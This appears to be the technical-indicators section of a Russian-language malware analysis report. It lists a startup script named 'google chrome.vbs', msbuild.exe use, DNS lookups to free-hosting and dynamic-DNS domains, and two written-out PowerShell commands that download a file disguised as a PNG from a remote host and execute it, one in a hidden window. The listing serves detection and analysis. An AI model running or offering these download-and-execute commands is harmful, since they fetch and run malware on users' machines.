Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ google chrome.vbs
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- 'ei##########6asf4qwfqas.000webhostapp.com':443
- DNS ASK ei##########6asf4qwfqas.000webhostapp.com
- DNS ASK ma####h01.ddns.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://eiascoqwdasf6asf4qwfqas.000webhostapp.com/AXswyZDhkfkrpBpQrCMQJEkxxGDiLCshkphvxDDZf44.png')' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://eiascoqwdasf6asf4qwfqas.000webhostapp.com/AXswyZDhkfkrpBpQrCMQJEkxxGDiLCshkphvxDDZf44.png')
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'